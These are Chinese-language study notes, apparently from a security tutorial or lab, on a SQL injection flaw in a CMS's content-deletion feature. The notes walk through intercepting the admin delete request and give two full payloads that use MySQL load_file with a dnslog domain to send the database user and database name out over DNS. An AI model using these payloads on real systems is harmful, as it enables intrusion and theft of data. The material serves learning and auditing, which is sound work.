sql注入漏洞
在处理删除内容时,传入的数据进行拼接赋值,整个数据传递过程仅对数组进行mysql_real_escape_string 处理,导致SQL注入漏洞
看一看漏洞产生的位置,
去审计cms框架
dnslog平台
有个账户,就提供二级域名 ,把信息放到三级域名上,就能看到信息
给了两级域名
把想得到信息放到 asdas 上
就会看见
让我们试着登录后台删除一下
开启抓包,点击确定
抓到数据包后,
1更改为 语句
payload
select load_file(concat('\\\\',(select hex(user())).'test.dnslog.link\\321'));
看看dnslog 能不能,获取到
得到了user 当前用户的信息,是编码形式
复制,解码 hex 转文本?? 加上0x
select load_file(concat('\\\\',(select database()).'test.dnslog.link\\321'));
也可以不加hex